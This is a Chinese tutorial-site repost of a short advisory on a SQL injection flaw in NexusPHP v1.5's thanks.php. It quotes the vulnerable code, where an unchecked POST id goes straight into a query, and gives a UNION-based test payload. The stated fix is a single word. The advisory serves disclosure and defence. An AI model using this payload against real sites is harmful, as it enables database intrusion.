网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

NexusPHP v1.5 SQL注射缺陷及修复 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 标题: Nexusphp.v1.5 SQL injection Vulnerability作者: flyh4t www.2cto.com下载地址: http://sourceforge.net/projects/nexusphp/影响版本: nexusphp.v1.5测试平台: linux+apacheNexusphp is BitTo......

 

标题: Nexusphp.v1.5 SQL injection Vulnerability 

作者: flyh4t  www.2cto.com

下载地址: http://sourceforge.net/projects/nexusphp/ 

影响版本: nexusphp.v1.5 

测试平台: linux+apache 

Nexusphp is BitTorrent private tracker scripts written in PHP  

 

源码下载:http://sourceforge.net/projects/nexusphp/ 

 

thanks.php存在一些sql注射缺陷

-----------------------代码分析------------------- 

 

//thanks.php 

 

if ($_GET['id']) 

 

 stderr("Party is over!", "This trick doesn't work anymore. You need to click the button!"); 

 

$userid = $CURUSER["id"]; 

 

$torrentid = $_POST["id"]; 

 

$tsql = sql_query("SELECT owner FROM torrents where id=$torrentid"); 

 

$arr = mysql_fetch_array($tsql); 

 

-----------------------end------------------- 

 $_POST["id"] is not checked, lead a sql injection Vulnerability 

-----------------------测试------------------- 

_POST[id] : -1 union select version()>4/*  www.2cto.com

-----------------------end -------------------

 

修复:checked

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论